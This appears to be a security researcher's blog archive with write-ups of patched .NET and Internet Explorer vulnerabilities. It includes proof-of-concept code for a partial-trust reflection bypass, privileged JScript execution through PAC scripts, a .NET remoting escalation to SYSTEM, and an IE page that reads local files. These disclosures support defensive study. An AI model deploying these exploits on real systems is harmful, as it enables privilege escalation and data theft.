Monday, 15 December 2014

Old .NET Vulnerability #2+3: Reflection Delegate Binding Bypass (CVE-2012-1895 and CVE-2013-3132)

Reflection is a very useful feature of frameworks such as .NET and Java, but it has interesting security issues when you're trying to sandbox code. One well-known issue is how hard the framework tries to emulate, for the reflection APIs, the caller visibility scoping which would exist if the code was compiled. Perhaps that needs a bit of explanation; imagine you have a C# class which looks something like the following:
using System.Runtime.InteropServices;

public class UnsafeMemory {
    IntPtr _ptr;
    ushort _size;

    public UnsafeMemory(ushort size) {
        _ptr = Marshal.AllocCoTaskMem(size);
        _size = size;
    }

    public byte ReadByte(ushort ofs) {
        if (ofs < _size) {
            return Marshal.ReadByte(_ptr, ofs);
        }

        return 0;
    }
}

This has a sensitive field: a pointer to a locally allocated memory structure which we don't want people to change. The built-in accessors don't allow you to specify anything other than the size (which is also sensitive, but slightly less so). Still, reflection allows us to change the pointer from a fully trusted application easily enough:
UnsafeMemory mem = new UnsafeMemory(1000);
FieldInfo fi = typeof(UnsafeMemory).GetField("_ptr", 
                  BindingFlags.NonPublic | BindingFlags.Instance);

fi.SetValue(mem, new IntPtr(0x12345678));

Now that we've set the pointer we can read and write arbitrary memory addresses. Flushed with success we try this in our partially trusted application and we get:
System.FieldAccessException: Attempt by method 
             'ReflectionTests.Program.Main()' to 
             access field 'ReflectionTests.UnsafeMemory._ptr' failed.
   at System.Reflection.RtFieldInfo.PerformVisibilityCheckOnField()
   at System.Reflection.RtFieldInfo.InternalSetValue()
   at System.Reflection.RtFieldInfo.SetValue()
   at System.Reflection.FieldInfo.SetValue()
   at ReflectionTests.Program.Main()

Well that sucks! PerformVisibilityCheckOnField is implemented inside the CLR so we can't easily look at its implementation (although it's in the SSCLI). But I think we can guess what the method is doing. The CLR is checking who's calling the SetValue method and verifying the visibility rules for the field. As the field is private, only the declaring class should be able to set it via reflection; we can verify that easily enough. Let's modify the class slightly to add a new method:
public static void TestReflection(FieldInfo fi, object @this, object value) {
    fi.SetValue(@this, value);
}

If we call that method from our partial trust code it succeeds, confirming our assumption about the visibility check. The same applies to any reflection artefact: properties, methods, constructors, events etc. Still, the example method is hardly a common coding pattern, so let's think more generally about visibility in the .NET framework to see if there's a case where we can easily bypass the check. There are actually many different visibility levels in the CLR, which can be summarised as:
Name in CLR        Name in C#          Visibility
Public             public              Anybody
Family             protected           Current class and derived classes
FamilyAndAssembly  No equivalent       Current class or derived classes in the same assembly
FamilyOrAssembly   protected internal  Current class and derived classes, or the same assembly
Assembly           internal            Current assembly
Private            private             Current class
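As a quick illustration of Assembly visibility, consider the following sketch (the types are made up for the example):

// Illustrative only: an internal member is accessible from any other
// class in the same assembly, no matter how unrelated the two are.
internal class SensitiveSettings {
    internal static bool SecurityChecksDisabled;
}

class CompletelyUnrelatedClass {
    static void Subvert() {
        // Legal: both classes live in the same assembly.
        SensitiveSettings.SecurityChecksDisabled = true;
    }
}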

Of most interest is Assembly (internal in C#) as you only have to take a quick peek at something like mscorlib to see that this visibility is used a lot to protect sensitive classes and methods by localising them to the current assembly. The Assembly visibility rule means that any class in the same assembly can access the field or method. When dealing with something like mscorlib, which has at least 900 public classes, you can imagine that would give you something you could exploit. It turns out a good place to look is the handling of delegates, if only for one reason: you can get them to call a method with the caller set to something in mscorlib, by using asynchronous dispatch.

For example if we run the following code we can get the calling method from the delegate; this correctly skips the methods which the CLR considers to be part of the delegate dispatch.
Func<MethodBase> f = new Func<MethodBase>(() => 
              new StackTrace().GetFrame(1).GetMethod());
MethodBase method = f();

Console.WriteLine("{0}::{1}", method.DeclaringType.FullName, method.Name);

OUTPUT: ReflectionTests.Program::Main

Not really surprising, the caller was our Main method. Okay now what if we change that to using asynchronous dispatch, using BeginInvoke and EndInvoke?
Func<MethodBase> f = new Func<MethodBase>(() => 
      new StackTrace().GetFrame(1).GetMethod());

IAsyncResult ar = f.BeginInvoke(null, null);
MethodBase method = f.EndInvoke(ar);

Console.WriteLine("{0}::{1}", method.DeclaringType.FullName, method.Name);

OUTPUT: System.Runtime.Remoting.Messaging.StackBuilderSink::_PrivateProcessMessage

How interesting, the code thinks the caller is an internal method in mscorlib; hopefully you can see where I'm going with this? Okay, let's put it all together: create a delegate pointing to FieldInfo.SetValue, call it via asynchronous dispatch and it's time to party.
Action<object, object> set_info = new Action<object,object>(fi.SetValue);

IAsyncResult ar = set_info.BeginInvoke(mem, new IntPtr(0x12345678), null, null);
set_info.EndInvoke(ar);

This works as expected with full trust, but running it under partial trust we get the dreaded SecurityException:
System.Security.SecurityException: Request for the permission 
       of type 'System.Security.Permissions.ReflectionPermission' failed.
   at System.Delegate.DelegateConstruct()
   at ReflectionTests.Program.Main()

So why is this the case? Well, the developers of .NET weren't stupid, they realised that being able to call a reflection API using another reflection API (which delegates effectively are) is a security hole waiting to happen. So if you try to bind a delegate to a certain set of methods it will demand ReflectionPermission first to check if you're allowed to do it. Still, while I said they weren't stupid, I didn't mean they don't make mistakes, as that's the crux of the two vulnerabilities I started writing this blog post about :-)

The problem comes down to this: the set of methods you cannot bind to is just a blacklist. Each method is allocated a set of invocation flags represented by the internal System.Reflection.INVOCATION_FLAGS enumeration. Perhaps the most important one from our perspective is the INVOCATION_FLAGS_FIELD_SPECIAL_CAST flag. This is a bit strangely named, but what it indicates is that the method should be double checked if it's ever invoked through a reflection API. If we look at FieldInfo.SetValue we'll find it has the flag set.

Okay, so the challenge is simple: just find a method which is equivalent to SetValue but isn't FieldInfo.SetValue. It turns out that FieldInfo implements the interface System.Runtime.InteropServices._FieldInfo, which is a COM interface for accessing the FieldInfo object. It just so happened that someone forgot to add this interface's methods to the blacklist. So let's see a real PoC, abusing the WeakReference class and its internal m_handle field:
// Create a weak reference to the string
string s = "tweakme";
WeakReference weakRef = new WeakReference(s);

// Get field info for the GC handle
FieldInfo f = typeof(WeakReference).GetField("m_handle",
    BindingFlags.NonPublic | BindingFlags.Instance);

// Get SetValue from the COM interface rather than FieldInfo itself
MethodInfo miSetValue = typeof(_FieldInfo).GetMethod("SetValue",
    BindingFlags.Public | BindingFlags.Instance, null,
    new Type[2] { typeof(object), typeof(object) }, null);

// Bind a delegate to _FieldInfo.SetValue with 'f' as the target
Action<object, object> setValue = (Action<object, object>)
    Delegate.CreateDelegate(typeof(Action<object, object>),
        f, miSetValue);

// Set garbage value in the handle via asynchronous dispatch
setValue.EndInvoke(setValue.BeginInvoke(weakRef,
    new IntPtr(0x0c0c0c0c), null, null));

// Crash here with a read AV on 0x0c0c0c0c
Console.WriteLine(weakRef.Target.ToString());

CVE-2012-1895 covered this issue for all the similar COM interfaces, such as _MethodInfo, _Assembly and _AppDomain. So I sent it over to MS and it was fixed. But of course even though you point out a security weakness in one part of the code it doesn't necessarily follow that they'll fix it everywhere. So a few months later I found that the IReflect interface has an InvokeMember method which was similarly vulnerable. That ended up as CVE-2013-3132, and by that point I gave up looking :-)

As a final note there was a similar issue which never got a CVE, although it was fixed. You could exploit it using something like the following:
// Bind a delegate to Delegate.CreateDelegate itself
MethodInfo mi = typeof(Delegate).GetMethod("CreateDelegate", 
    BindingFlags.Public | BindingFlags.Static, 
    null, new Type[] { typeof(Type), typeof(MethodInfo) }, null);

Func<Type, MethodInfo, Delegate> func = (Func<Type, MethodInfo, Delegate>)
    Delegate.CreateDelegate(typeof(Func<Type, MethodInfo, Delegate>), mi);

// Look up Marshal.ReadByte(IntPtr)
Type marshalType = Type.GetType("System.Runtime.InteropServices.Marshal");
MethodInfo readByte = marshalType.GetMethod("ReadByte", 
    BindingFlags.Public | BindingFlags.Static,
    null, new Type[] { typeof(IntPtr) }, null);

// Create the delegate via asynchronous dispatch so the caller
// appears to be inside mscorlib
IAsyncResult ar = func.BeginInvoke(typeof(Func<IntPtr, byte>), readByte, null, null);
Func<IntPtr, byte> r = (Func<IntPtr, byte>)func.EndInvoke(ar);

r(new IntPtr(0x12345678)); 

It's left as an exercise for the reader to understand why that works (hint: it isn't a scope issue as Marshal.ReadByte is public). I'll describe it in more detail next time.

Sunday, 30 November 2014

Old .NET Vulnerability #1: PAC Script RCE (CVE-2012-4776)

This is the start of a very short series on some of my old .NET vulnerabilities which have been patched. Most of these issues have never been publicly documented, or at least there have been no PoCs made available. Hopefully it's interesting to some people.

The first vulnerability I'm going to talk about is CVE-2012-4776, which was fixed in MS12-074. It was an issue in the handling of Web Proxy Auto-Configuration (PAC) scripts. It was one of the few times that MS has credited me with an RCE in .NET since they made it harder to execute .NET code from IE. Though to be fair, making it harder might be partially my fault.

The purpose of a PAC script, if you've never encountered one before, is to allow a web client to run some proxy decision logic before it connects to a web server. An administrator can configure the script to make complex decisions on how outbound connections are made, for example forcing all external web sites through a gateway proxy while letting Intranet connections go direct to the server. You can read all about it on Wikipedia and many other sites as well, but the crucial thing to bear in mind is that the PAC script is written in Javascript. The most basic PAC script you can create is as follows:
function FindProxyForURL(url, host) {
 // Always return no proxy setting
 return "DIRECT";
}
On Windows, if you use the built-in HTTP libraries such as WinINET and WinHTTP you don't need to worry about these files yourself, but if you roll your own HTTP stack, like .NET does, you're on your own to reimplement this functionality. So when faced with this problem what to do? If you answered, "let's use a .NET implementation of Javascript" you'd be correct. Some people don't realise that .NET comes with its own implementation of Javascript (JScript, for licensing reasons). It even comes with a compiler, jsc.exe, installed by default.

While I was having a look at .NET, evaluating anything interesting which asserts full trust permissions, I came across the .NET PAC implementation. The following method is from the System.Net.VsaWebProxyScript class in the Microsoft.JScript assembly (some code removed for brevity):
[PermissionSet(SecurityAction.Assert, Name="FullTrust")]
public bool Load(Uri engineScriptLocation, string scriptBody, Type helperType)
{
    try
    {
        engine = new VsaEngine();
        engine.RootMoniker = "pac-" + engineScriptLocation.ToString();
        engine.Site = new VsaEngineSite(helperType);
        engine.InitNew();
        engine.RootNamespace = "__WebProxyScript";

        StringBuilder sb = new StringBuilder();
        sb.Append("[assembly:System.Security.SecurityTransparent()] ...");
        sb.Append("class __WebProxyScript { ... }\r\n");
        sb.Append(scriptBody);
        IVsaCodeItem item2 = engine.Items.CreateItem("SourceText", 
                   VsaItemType.Code, VsaItemFlag.None) as IVsaCodeItem;
        item2.SourceText = sb.ToString();

        if (engine.Compile())
        {
            engine.Run();
            scriptInstance = Activator.CreateInstance(
                 engine.Assembly.GetType("__WebProxyScript.__WebProxyScript"));
            CallMethod(scriptInstance, "SetEngine", new object[] { engine });
            return true;
        }
    }
    catch
    {
    }
    return false;
}
The code is taking the PAC script from the remote location as a string, putting it together with some boilerplate code to implement the standard PAC functions and compiling it to an assembly. This seems too good to be true from an exploit perspective. It was time to give it a try, so I configured a simple .NET application with a PAC script by adding the following configuration to the application:
<configuration>
  <system.net>
    <defaultProxy>
      <proxy
        autoDetect="true"
        scriptLocation="http://127.0.0.1/test.js"
      />
    </defaultProxy>
  </system.net>
</configuration>
Of course in a real-world scenario the application probably isn't going to be configured like this. Instead the proxy settings might be configured through WPAD (which is known to be spoofable) or through the system settings. When the application makes a connection using the System.Net.WebClient class it will load the PAC file from the scriptLocation and execute it. With a test harness ready let's try a few things:
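For reference, a minimal harness can be as simple as the following (the target URL is arbitrary); any request through the .NET HTTP stack triggers proxy resolution, which downloads and runs the PAC script:

using System.Net;

class Harness {
    static void Main() {
        using (WebClient wc = new WebClient()) {
            // Proxy resolution runs before the request is made, which
            // fetches and evaluates the configured PAC script.
            wc.DownloadString("http://www.example.com/");
        }
    }
}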
import System;

function FindProxyForURL(url, host) {
 Console.WriteLine("Hello World!");
 return "DIRECT";
}
This printed out "Hello World!" as you'd expect, so we can compile and execute JScript.NET code. Awesome. So let's go for the win!
import System.IO;

function FindProxyForURL(url, host) {
 File.WriteAllText("test.txt", "Hello World!");
 return "DIRECT";
}
And... it fails, silently I might add :-( I guess we need to get to the bottom of this. When dealing with the internals of the framework I usually find it easiest to get WinDBG involved. All .NET framework versions come with a handy debugger extension, SOS, which we can use to do low-level debugging of .NET code. A quick tutorial: open the .NET executable in WinDBG and run the following two lines at the console.
sxe clr
sxe -c ".loadby sos mscorwks; gh" ld:mscorwks
These lines set WinDBG to stop on a CLR exception (.NET uses Windows SEH under the hood to pass on exceptions) and add a handler to load the SOS library when the mscorwks DLL gets loaded. This DLL is the main part of the CLR; we can't actually do any .NET debugging until the CLR is started. As a side note, if this was .NET 4 and above replace mscorwks with clr as that framework uses clr.dll as its main implementation.

Restarting the execution of the application we wait for the debugger to break on the CLR exception. Once we've broken into the debugger you can use the SOS command !pe to dump the current exception:


Well, no surprises, we got a SecurityException trying to open the file we specified. Now at this point it's clear that the PAC script must be running in Partial Trust (PT). This isn't necessarily an issue as I still had a few PT escapes to hand, but it would be nice not to need one. By dumping the call stack using the !clrstack command we can see that the original caller was System.Net.AutoWebProxyScriptWrapper. 

Looking at that class confirms our suspicion of being run in PT. In the class' CreateAppDomain method it creates an Internet security AppDomain, which is going to be pretty limited in permissions, then initializes the System.Net.VsaWebProxyScript object inside it. As that class derives from MarshalByRefObject it doesn't leave the restricted AppDomain. Still, in situations like this you shouldn't be disheartened; let's go back and look at how the assembly was being loaded into memory. We find it's being loaded from a byte array (maybe bad) but passing a null for the evidence parameter (awesome). As we can see in the remarks from Assembly.Load this is a problem:
When you use a Load method overload with a Byte[] parameter to load a COFF image, 
evidence is inherited from the calling assembly. This applies to the .NET Framework 
version 1.1 Service Pack 1 (SP1) and subsequent releases.
So what we end up with is an assembly which inherits its permissions from the calling assembly. The calling assembly is trusted framework code, which means our compiled PAC code is also trusted code. So why doesn't the file function work? Well, you have to remember how security in AppDomains interacts with the security stack walk when a demand for a permission is requested.

The transition between the trusted and the untrusted AppDomains acts as a PermitOnly security boundary. What this means is that even if every caller on the current stack is trusted, if no-one asserts higher permissions than the AppDomain's current set then a demand will fail, as shown in the below diagram:



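You can reproduce the effect of such a boundary in a few lines; here's a minimal sketch where PermitOnly stands in for the restricted AppDomain's grant set:

using System;
using System.IO;
using System.Security;
using System.Security.Permissions;

class PermitOnlyDemo {
    static void Main() {
        // Restrict the effective permissions of everything below this
        // frame to execution only.
        PermissionSet ps = new PermissionSet(PermissionState.None);
        ps.AddPermission(new SecurityPermission(SecurityPermissionFlag.Execution));
        ps.PermitOnly();
        try {
            // Fails with a SecurityException even though every assembly
            // on the stack is fully trusted, because nothing above this
            // point asserts FileIOPermission.
            File.WriteAllText("test.txt", "Hello World!");
        } catch (SecurityException) {
            Console.WriteLine("Demand failed at the PermitOnly boundary");
        } finally {
            CodeAccessPermission.RevertPermitOnly();
        }
    }
}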
There are plenty of ways around this situation; in fact we'll see a few in my next post on this topic. But for now there's an easy way past this issue: all we need is something to assert suitable permissions for us while we run our code. Turns out it was there all along, the original Load method uses the attribute form of permission assertion to assert full trust.
[PermissionSet(SecurityAction.Assert, Name="FullTrust")]
We can get code to run in that method because the loading of the assembly will execute any global JScript code automatically, so a quick modification and we get privileged execution:
import System.IO;

File.WriteAllText("test.txt", "Hello World!");

function FindProxyForURL(url, host) { 
 return "DIRECT";
}
Why couldn't we have just done a new PermissionSet(PermissionState.Unrestricted).Assert() here? Well, if you look at the code being generated for compilation it sets the SecurityTransparent assembly attribute. This tells the CLR that this code isn't allowed to elevate its permissions, but is transparent to security decisions. If you have a trusted assembly which is transparent it doesn't affect the stack walk at all, but it also cannot assert higher permissions. This is why the assertion in the Load method was so important. Of course that assertion was what originally led me to find the code in the first place.

Microsoft fixed this in two ways. First they "fixed" the JScript code to not execute under a privileged permission set, as well as passing an appropriate evidence object to the assembly load. And secondly they basically blocked use of JScript.NET by default (see the notes in the KB article here). If you ever find a custom implementation of PAC scripts in an application it's always worth a quick look to see what they're using.


Monday, 24 November 2014

Stupid is as Stupid Does When It Comes to .NET Remoting

Finding vulnerabilities in .NET is something I quite enjoy, it generally meets my criteria of only looking for logic bugs. Probably the first research I did was into .NET serialization where I got some interesting results, and my first Blackhat USA presentation slot. One of the places where you could abuse serialization was in .NET remoting, which is a technology similar to Java RMI or CORBA to access .NET objects remotely (or on the same machine using IPC). Microsoft consider it a legacy technology and you shouldn't use it, but that won't stop people.

One day I came to the realisation that while I'd talked about how dangerous it was I'd never released any public PoC for exploiting it. So I decided to start writing a simple tool to exploit vulnerable servers, that was my first mistake. As I wanted to fully understand remoting to write the best tool possible I decided to open my copy of Reflector, that was my second mistake. I then looked at the code, sadly that was my last mistake.

TL;DR you can just grab the tool and play. If you want a few of the sordid details of CVE-2014-1806 and CVE-2014-4149 then read on.

.NET Remoting Overview

Before I can describe what the bug is I need to describe how .NET remoting works a little bit. Remoting was built into the .NET framework from the very beginning. It supports a pluggable architecture where you can replace many of the pieces, but I'm just going to concentrate on the basic implementation and what's important from the perspective of the bug. MSDN has plenty of resources which go into a bit more depth and there's always the official documentation MS-NRTP and MS-NRBF. A good description is available here.

The basics of .NET remoting are that you have a server class derived from MarshalByRefObject. This indicates to the .NET framework that this object can be called remotely. The server code can publish this server object using the remoting APIs such as RemotingConfiguration.RegisterWellKnownServiceType. On the client side a call can be made to APIs such as Activator.GetObject which will establish a transparent proxy for the client. When the client makes a call on this proxy the method information and parameters are packaged up into an object which implements the IMethodCallMessage interface. This object is sent to the server which processes the message, calls the real method and returns the return value (or exception) inside an object which implements the IMethodReturnMessage interface.
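As a concrete sketch (the IServer/MyServer names are made up and the channel setup is elided), the two sides look something like this:

using System;
using System.Runtime.Remoting;

public interface IServer { void DoSomething(); }

// Deriving from MarshalByRefObject is what makes the object remotable.
public class MyServer : MarshalByRefObject, IServer {
    public void DoSomething() { Console.WriteLine("called"); }
}

class Demo {
    static void RunServer() {
        // Publish the object under a well-known name. Combined with a
        // registered channel (e.g. an IpcChannel named ServerChannel)
        // this gives a URL like ipc://ServerChannel/Server.rem.
        RemotingConfiguration.RegisterWellKnownServiceType(
            typeof(MyServer), "Server.rem", WellKnownObjectMode.Singleton);
    }

    static void RunClient() {
        // Returns a transparent proxy; calling a method on it packages
        // the call into an IMethodCallMessage behind the scenes.
        IServer proxy = (IServer)Activator.GetObject(
            typeof(IServer), "ipc://ServerChannel/Server.rem");
        proxy.DoSomething();
    }
}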

When a remoting session is constructed we need to create a couple of Channels, a Client Channel for the client and a Server Channel for the server. Each channel contains a number of pluggable components called sinks. A simple example is shown below:


The transport sinks are unimportant for the vulnerability. These sinks are used to actually transport the data in some form, for example as binary over TCP. The important things to concentrate on from the perspective of the vulnerabilities are the Formatter Sinks and the StackBuilder Sink.

Formatter Sinks take the IMethodCallMessage or IMethodReturnMessage objects and format their contents so that they can be sent across the transport. They're also responsible for unpacking the result at the other side. As the operations are asymmetric from the channel perspective there are two different formatter sink interfaces, IClientChannelSink and IServerChannelSink.

While you can select your own formatter sink the framework will almost always give you a formatter based on the BinaryFormatter object which as we know can be pretty dangerous due to the potential for deserialization bugs. The client sink is implemented in BinaryClientFormatterSink and the server sink is BinaryServerFormatterSink.

The StackBuilder sink is an internal-only class implemented by the framework for the server. Its job is to unpack the IMethodCallMessage information, find the destination server object to call, verify the security of the call, call the server and finally package up the return value into an IMethodReturnMessage object.

This is a very high level overview, but we'll see how this all interacts soon.

The Exploit

Okay so on to the actual vulnerability itself, let's take a look at how the BinaryServerFormatterSink processes the initial .NET remoting request from the client in the ProcessMessage method:

IMessage requestMsg;
PermissionSet set = null;

if (this.TypeFilterLevel != TypeFilterLevel.Full)
{
     set = new PermissionSet(PermissionState.None);
     set.SetPermission(
           new SecurityPermission(SecurityPermissionFlag.SerializationFormatter));
}
try
{
    if (set != null)
    {
        set.PermitOnly();
    }
    requestMsg = CoreChannel.DeserializeBinaryRequestMessage(uRI, requestStream, 
               _strictBinding, TypeFilterLevel);
}
finally
{
    if (set != null)
    {
         CodeAccessPermission.RevertPermitOnly();
    }
}
We can see in this code that the request data from the transport is thrown into DeserializeBinaryRequestMessage. The code around it relates to the serialization type filter level, which I'll describe later. So what's the method doing?
internal static IMessage DeserializeBinaryRequestMessage(string objectUri, 
              Stream inputStream, bool bStrictBinding, TypeFilterLevel securityLevel)
{
    BinaryFormatter formatter = CreateBinaryFormatter(false, bStrictBinding);
    formatter.FilterLevel = securityLevel;
    UriHeaderHandler handler = new UriHeaderHandler(objectUri);
    return (IMessage) formatter.UnsafeDeserialize(inputStream, 
              new HeaderHandler(handler.HeaderHandler));
}

For all intents and purposes it isn't doing a lot. It's passing the request stream to a BinaryFormatter and returning the result. The result is cast to an IMessage interface and the object is passed on for further processing. Eventually it ends up passing the message to the StackBuilder sink, which verifies the method being called is valid then executes it. Any result is passed back to the client.

So now for the bug: it turns out that nothing checked that the result of the deserialization was a local object. Could we instead insert a remote IMethodCallMessage object into the serialized stream? It turns out yes we can. Serializing an object which implements the interface but is also derived from MarshalByRefObject serializes an instance of an ObjRef class which points back to the client.

But why would this be useful? Well, it turns out there's a Time-of-Check Time-of-Use vulnerability if an attacker can return different results from the MethodBase property. By returning a MethodBase for Object.ToString (which is always allowed) at some points, the server is tricked into accepting the call. Then, once the StackBuilder sink goes to dispatch the method, we replace it with something more dangerous, say Process.Start instead. And you've just got arbitrary code executing in the remoting service.
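To make the idea concrete, here's a hypothetical sketch of such a message (the class and the exact number of benign answers are illustrative; a working PoC needs to match how often the server actually queries MethodBase):

using System;
using System.Collections;
using System.Diagnostics;
using System.Reflection;
using System.Runtime.Remoting.Messaging;

// Lives in the attacker's process; serializing it sends an ObjRef, so
// the server calls back into these properties over the channel.
public class ToctouMessage : MarshalByRefObject, IMethodCallMessage {
    private int _queries;

    public MethodBase MethodBase {
        get {
            // Benign answer while the server validates the call,
            // dangerous answer when it actually dispatches it.
            return ++_queries <= 2
                ? typeof(object).GetMethod("ToString")
                : typeof(Process).GetMethod("Start", new[] { typeof(string) });
        }
    }

    public object[] Args { get { return new object[] { "calc.exe" }; } }
    public int ArgCount { get { return 1; } }
    public object GetArg(int i) { return Args[i]; }
    public string GetArgName(int i) { return "arg" + i; }
    public object[] InArgs { get { return Args; } }
    public int InArgCount { get { return 1; } }
    public object GetInArg(int i) { return Args[i]; }
    public string GetInArgName(int i) { return "arg" + i; }
    public bool HasVarArgs { get { return false; } }
    public LogicalCallContext LogicalCallContext { get { return null; } }
    public string MethodName { get { return "ToString"; } }
    public object MethodSignature { get { return null; } }
    public string TypeName { get { return typeof(object).FullName; } }
    public string Uri { get { return "Server.rem"; } }
    public IDictionary Properties { get { return new Hashtable(); } }
}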

In order to actually exploit this you pretty much need to implement most of the remoting code manually; fortunately it is documented so that doesn't take very long. You can repurpose the existing .NET BinaryFormatter code to do most of the other work for you. I'd recommend taking a look at the github project for more information on how this all works.

So that was CVE-2014-1806, but what about CVE-2014-4149? Well it's the same bug; MS didn't fix the TOCTOU issue, instead they added a call to RemotingServices.IsTransparentProxy just after the deserialization. Unfortunately that isn't the only way you can get a remote object from deserialization. .NET supports quite extensive COM interop and as luck would have it all the IMessage interfaces are COM accessible. So instead of a remoting object we inject a COM implementation of the IMethodCallMessage interface (which ironically can be written in .NET anyway). This works best locally as then you don't need to worry so much about COM authentication, but it should work remotely. The final fix was to check if the object returned is an instance of MarshalByRefObject, as it turns out that the transparent COM object, System.__ComObject, derives from that class just as transparent proxies do.

Of course if the service is running with a TypeFilterLevel set to Full then even with these fixes the service can still be vulnerable. In this case you can deserialize anything you like in the initial remoting request to the server. Then using reflection tricks you can capture FileInfo or DirectoryInfo objects which give access to the filesystem at the privileges of the server. The reason you can do this is these objects are both serializable and derive from MarshalByRefObject. So you can send them to the server serialized, but when the server tries to reflect them back to the client they end up staying in the server as remote objects.

Real-World Example

Okay, let's see this in action in a real world application. I bought a computer a few years back which had the Intel Rapid Storage Technology drivers version 11.0.0.1032 pre-installed (the specific version can be downloaded here). This contains a vulnerable .NET remoting server which we can exploit locally to get local system privileges. A note before I continue: from what I can tell the latest versions of these drivers no longer use .NET remoting for the communication between the user client and the server, so I've never contacted Intel about the issue. That said there's no automatic update process, so if, like me, you had the original insecure version installed, well, you have a trivial local privilege escalation on your machine :-(

Bringing up Reflector and opening the IAStorDataMgrSvc.exe application (which is the local service) we can find the server side of the remoting code below:

public void Start()
{
    BinaryServerFormatterSinkProvider serverSinkProvider =
        new BinaryServerFormatterSinkProvider {
           TypeFilterLevel = TypeFilterLevel.Full
    };
    BinaryClientFormatterSinkProvider clientSinkProvider = new BinaryClientFormatterSinkProvider();
    IdentityReferenceCollection groups = new IdentityReferenceCollection();

    IDictionary properties = new Hashtable();
    properties["portName"] = "ServerChannel";
    properties["includeVersions"] = "false";
    mChannel = new IpcChannel(properties, clientSinkProvider, serverSinkProvider);
    ChannelServices.RegisterChannel(mChannel, true);
    mServerRemotingRef = RemotingServices.Marshal(mServer,
        "Server.rem", typeof(IServer));
    mEngine.Start();
}

So there are a few things to note about this code. It's using IpcChannel, so it's going over named pipes (reasonable for a local service). It's setting the portName to ServerChannel; this is the name of the named pipe on the local system. It then registers the channel with the secure flag set to True and finally it configures an object with the well known name of Server.rem which will be exposed on the channel. Also worth noting, it's setting the TypeFilterLevel to Full; we'll get back to that in a minute.

For exploitation purposes we can therefore build the service URL as ipc://ServerChannel/Server.rem. So let's try sending it a command. In this case I had updated for the fix to CVE-2014-1806 but not for CVE-2014-4149, so we need to pass the -usecom flag to use a COM return channel.


Well that was easy, direct code execution at local system privileges. But of course if we now update to the latest version it will stop working again. Fortunately though I highlighted that they were setting the TypeFilterLevel to Full. This means we can still attack it using arbitrary deserialization. So let's try and do that instead:


In this case we know the service's directory and can upload our custom remoting server to the same directory the server executes from. This allows us to get full access to the system. Of course if we don't know where the server is we can still use the -useser flag to list and modify the file system (with the privileges of the server) so it might still be possible to exploit even if we don't know where the server is running from.

Mitigating Against Attacks

I can't be 100% certain there aren't other ways of exploiting this sort of bug; at the least I can't rule out bypassing the TypeFilterLevel stuff through one trick or another. Still there are definitely a few ways of mitigating it. One is to not use remoting; MS has deprecated the technology in favour of WCF, but it isn't getting rid of it yet.

If you have to use remoting you could use secure mode with user account checking. Also if you have complete control over the environment you could randomise the service name per-deployment, which would at least prevent mass exploitation. An outbound firewall would also come in handy to block outgoing back channels. 


Tuesday, 11 November 2014

When's document.URL not document.URL? (CVE-2014-6340)

I don't tend to go after cross-origin bugs in web browsers, after all XSS is typically far easier to find (disclaimer: I don't go after XSS either), but sometimes they're fun. Internet Explorer is a special case; most web browsers don't make much of a distinction between origins for security purposes but IE does. Its zone mechanisms can make cross-origin bugs interesting, especially when they interact with ActiveX plugins. The origin *ahem* of CVE-2014-6340 came from some research into a site-locking ActiveX plugin. I decided to see if I could find a generic way of bypassing the site-lock and found a bug in IE which has existed since at least IE6.

Let's start with how an ActiveX control will typically site-lock, as in only allow the control to be interacted with if hosted on a page from a particular domain. When an ActiveX control is instantiated it's passed a "Site" object which represents the container of the ActiveX control. This might be through implementing IObjectWithSite::SetSite or IOleObject::SetClientSite. When passed the site object the well known way of getting the hosting page's URL is to call the IHTMLDocument2::get_URL method with code similar to the following:
IOleClientSite* pOleClientSite;
IOleContainer* pContainer;

pOleClientSite->GetContainer(&pContainer);

IHTMLDocument2* pHtmlDoc;

pContainer->QueryInterface(IID_PPV_ARGS(&pHtmlDoc));

BSTR bstrURL;

pHtmlDoc->get_URL(&bstrURL);

// We now have the hosting URL.

Anything which is based on the published Microsoft site-locking template code does something similar. So we can conclude that for a site-locking ActiveX control the document.URL property is important. Even though this is a DOM property it's implemented at the native code level so you can't use Javascript to override it. So I guess we need to dig into MSHTML to find out where the URL value comes from. Bringing up the function in IDA led me to the following:



One of the first things IHTMLDocument2::get_URL calls is CMarkup::GetMarkupPrintUri. What's most interesting is that if this returns successfully it exits the function with a successful return code. Of course if you look at the code flow it only enters that block of code if the markup document object returned from CDocument::Markup has bit 1 set at byte offset 0x31. So where does that get set? Well, annoyingly, 0x31 is hardly a rare number so doing an immediate search in IDA was a pain. Still, eventually I found where you could set it: in the IHTMLDocument4::put_media function:


Still clearly that function must be documented? Nope, not a bit of it:



Well I could go on but I'll cut the story short for sanity's sake. What the media property does is set whether the document is currently an HTML document or a print template. It turns out this is an old property which probably should never be used, but is one of those things which is kept around for legacy purposes. As long as you convert the current document to a print template, using the OLECMDID_SETPRINTTEMPLATE command to ExecWB on the web browser, this code path will execute. 

The final step is working out how you influence the URL property. After a bit of digging you'll find the following code in CMarkup::FindMarkupPrintUri:



Hmm, well, it seems to be reading the attribute __IE_DisplayURL from the top element of the document and returning that as the URL. Okay, let's try that, using something like XMLHttpRequest to see if we can read local files. For example:

<html __IE_DisplayURL="file:///c:/">
<body>
<h1>
PoC for IE_DisplayURL Issue</h1>
<object border="1" classid="clsid:8856f961-340a-11d0-a96b-00c04fd705a2" id="obj">NO OBJECT</object>
<script>
try {
 // Set document to a print template
 var wb = document.getElementById("obj").object;
 wb.ExecWB(51, 0, true);

 // Enable print media mode
 document.media = "print";

 // Read a local file
 var x = new ActiveXObject("msxml2.xmlhttp");
 x.open("GET", "file:///c:/windows/win.ini", false);
 x.send();
 alert(x.responseText);

 // Disable again to get scripting back (not really necessary)
 document.media = "screen";

} catch(e) {
 alert(e.message);
}
</script>
</body>
</html>
This example only works when running in the Intranet Zone because it requires the ability to script the web browser. Can it be done from the Internet Zone? Probably ;-) In the end Microsoft classed this as an Information Disclosure, but is it? Well, probably in a default installation of Windows. But mix in third-party ActiveX controls and you have yourself the potential for RCE. Perhaps sit back with a cup of *Coffee* and think about what ActiveX controls might be interesting to play with ;-)

Tuesday, 14 October 2014

A Tale of Two .NET Methods

